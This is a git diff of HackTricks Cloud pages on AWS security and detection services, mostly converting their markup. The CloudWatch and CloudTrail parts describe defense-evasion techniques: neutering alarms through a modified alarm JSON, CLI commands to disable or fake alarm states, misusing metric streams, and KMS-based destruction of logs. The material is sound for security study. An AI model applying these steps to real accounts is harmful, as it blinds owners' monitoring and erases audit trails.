Cloudtrail ransomware @@ -298,33 +276,20 @@ aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ This is basically a **S3-KMS ransomware** explained in: -{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %} -[aws-s3-post-exploitation.md](../../aws-post-exploitation/aws-s3-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-s3-post-exploitation.md +{{#endref}} **KMS ransomware** This is an easiest way to perform the previous attack with different permissions requirements: -{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} ## **References** -* [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) +- [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md similarity index 77% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md index 69b0af807..482a2a1b8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md @@ -1,19 +1,6 @@ # AWS - CloudWatch Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## CloudWatch @@ -23,12 +10,12 @@ It can set **high resolution alarms**, visualize **logs** and **metrics** side b You can monitor for example logs from CloudTrail. Events that are monitored: -* Changes to Security Groups and NACLs -* Starting, Stopping, rebooting and terminating EC2 instances -* Changes to Security Policies within IAM and S3 -* Failed login attempts to the AWS Management Console -* API calls that resulted in failed authorization -* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) +- Changes to Security Groups and NACLs +- Starting, Stopping, rebooting and terminating EC2 instances +- Changes to Security Policies within IAM and S3 +- Failed login attempts to the AWS Management Console +- API calls that resulted in failed authorization +- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) ## Key concepts @@ -36,31 +23,31 @@ You can monitor for example logs from CloudTrail. Events that are monitored: A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. -* **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. +- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. ### Metrics Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. -* **Example**: CPUUtilization, NetworkIn, DiskReadOps. +- **Example**: CPUUtilization, NetworkIn, DiskReadOps. ### Dimensions Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. -* **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. +- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. ### Statistics Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. -* **Example**: Calculating the average CPU utilization over a period of one hour. +- **Example**: Calculating the average CPU utilization over a period of one hour. ### Units Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. -* **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. +- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. ## CloudWatch Features @@ -70,12 +57,12 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Features**: -* **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. -* **Customization**: Layout and content can be customized to fit specific monitoring needs. +- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. +- **Customization**: Layout and content can be customized to fit specific monitoring needs. **Example Use Case**: -* A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. +- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. ### Metric Stream and Metric Data @@ -85,8 +72,8 @@ Units are the measurement type associated with a metric. Units help to provide c **Example Use Case**: -* Sending real-time metrics to a third-party monitoring service for advanced analysis. -* Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. +- Sending real-time metrics to a third-party monitoring service for advanced analysis. +- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. ### Alarm @@ -94,14 +81,14 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Components**: -* **Threshold**: The value at which the alarm triggers. -* **Evaluation Periods**: The number of periods over which data is evaluated. -* **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm -* **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). +- **Threshold**: The value at which the alarm triggers. +- **Evaluation Periods**: The number of periods over which data is evaluated. +- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm +- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). **Example Use Case**: -* Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. +- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. ### Anomaly Detectors @@ -109,12 +96,12 @@ Units are the measurement type associated with a metric. Units help to provide c **Key Components**: -* **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. -* **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. +- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. +- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. **Example Use Case**: -* Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. +- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. ### Insight Rules and Managed Insight Rules @@ -124,7 +111,7 @@ Units are the measurement type associated with a metric. Units help to provide c **Example Use Case**: -* Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. +- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. ### CloudWatch Logs @@ -146,9 +133,9 @@ In that case, CLoudWatch can be prepared to send an event and perform some autom You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. -* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -* **Configure** and **start** the CloudWatch Agent +- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage +- **Configure** and **start** the CloudWatch Agent A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. @@ -175,7 +162,7 @@ aws cloudwatch get-metric-data --metric-data-queries --start-time --metric-name [--dimensions ] --start-time --end-time --period ## Returns a list of the metric streams of your account -aws cloudwatch list-metric-streams +aws cloudwatch list-metric-streams ## Retrieves information about the specified metric stream aws cloudwatch get-metric-stream --name @@ -202,7 +189,7 @@ aws cloudwatch describe-anomaly-detectors [--namespace ] [--metric-name < ## Lists all the Contributor Insight rules in your account aws cloudwatch describe-insight-rules -## Retrieves the data collected over a time range for a given Contributor Insight rule +## Retrieves the data collected over a time range for a given Contributor Insight rule aws cloudwatch get-insight-rule-report --rule-name --start-time --end-time --period ## Lists managed Contributor Insights rules in your account for a specified resource @@ -243,11 +230,12 @@ aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [-- The following example shows how to make a metric alarm ineffective: -* This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. -* By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. +- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. +- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. + +{{#tabs }} +{{#tab name="Original Metric Alarm" }} -{% tabs %} -{% tab title="Original Metric Alarm" %} ```json { "Namespace": "AWS/EC2", @@ -258,9 +246,7 @@ The following example shows how to make a metric alarm ineffective: "Value": "i-01234567890123456" } ], - "AlarmActions": [ - "arn:aws:sns:us-east-1:123456789012:example_sns" - ], + "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], "ComparisonOperator": "GreaterThanThreshold", "DatapointsToAlarm": 4, "EvaluationPeriods": 6, @@ -271,9 +257,11 @@ The following example shows how to make a metric alarm ineffective: "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" } ``` -{% endtab %} -{% tab title="Modified Metric Alarm" %} +{{#endtab }} + +{{#tab name="Modified Metric Alarm" }} + ```json { "Namespace": "AWS/EC2", @@ -294,10 +282,10 @@ The following example shows how to make a metric alarm ineffective: "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" } - ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. @@ -307,7 +295,7 @@ By deleting alarm actions, the attacker could prevent critical alerts and automa In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. -* If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. +- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. ```bash aws cloudwatch disable-alarm-actions --alarm-names @@ -328,52 +316,56 @@ aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity: -* **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. -* **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. -* **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. +- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations. +- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues. +- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden. Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless. @@ -459,21 +451,8 @@ aws cloudwatch untag-resource --resource-arn --tag-keys ## References -* [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) -* [https://docs.aws.amazon.com/es\_es/AmazonCloudWatch/latest/monitoring/cloudwatch\_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) +- [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html) +- [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md index 3736b5511..55b736e3a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md @@ -1,19 +1,6 @@ # AWS - Config Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS Config @@ -21,11 +8,11 @@ AWS Config **capture resource changes**, so any change to a resource supported b A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. -* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. +- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. +- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance +- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. +- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. +- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. **Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. @@ -37,36 +24,23 @@ A configuration item or **CI** as it's known, is a key component of AWS Config. ### Functioning -* When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config -* Stores everything in S3 bucket -* Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings -* Lambda feeds back to Config -* If rule has been broken, Config fires up an SNS +- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config +- Stores everything in S3 bucket +- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings +- Lambda feeds back to Config +- If rule has been broken, Config fires up an SNS -![](<../../../../.gitbook/assets/image (126).png>) +![](<../../../../images/image (126).png>) ### Config Rules Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. -* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -* **Custom rules**: You can create your own rules to check specific customconfigurations. +- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. +- **Custom rules**: You can create your own rules to check specific customconfigurations. Limit of 50 config rules per region before you need to contact AWS for an increase.\ Non compliant results are NOT deleted. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md new file mode 100644 index 000000000..bbb19dd0a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md @@ -0,0 +1,42 @@ +# AWS - Control Tower Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Control Tower + +> [!NOTE] +> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them. + +AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. + +AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. + +With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. + +In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. + +Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. + +### Enumeration + +For enumerating controltower controls, you first need to **have enumerated the org**: + +{{#ref}} +../aws-organizations-enum.md +{{#endref}} + +```bash +# Get controls applied in an account +aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ +``` + +> [!WARNING] +> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts + +### Post Exploitation & Persistence + +{{#ref}} +../../aws-post-exploitation/aws-control-tower-post-exploitation.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md new file mode 100644 index 000000000..579789482 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md @@ -0,0 +1,15 @@ +# AWS - Cost Explorer Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Cost Explorer and Anomaly detection + +This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ +Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. + +### Budgets + +Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ +Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md new file mode 100644 index 000000000..44633cf30 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -0,0 +1,16 @@ +# AWS - Detective Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Detective + +**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. + +The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. + +## References + +- [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) +- [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md similarity index 81% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index 8c2d01c88..842501e7f 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -1,19 +1,6 @@ # AWS - Firewall Manager Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Firewall Manager @@ -25,8 +12,8 @@ A **rule group** (a collection of WAF rules) can be incorporated into an AWS Fir AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists: -* **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. -* **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. +- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version. +- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, 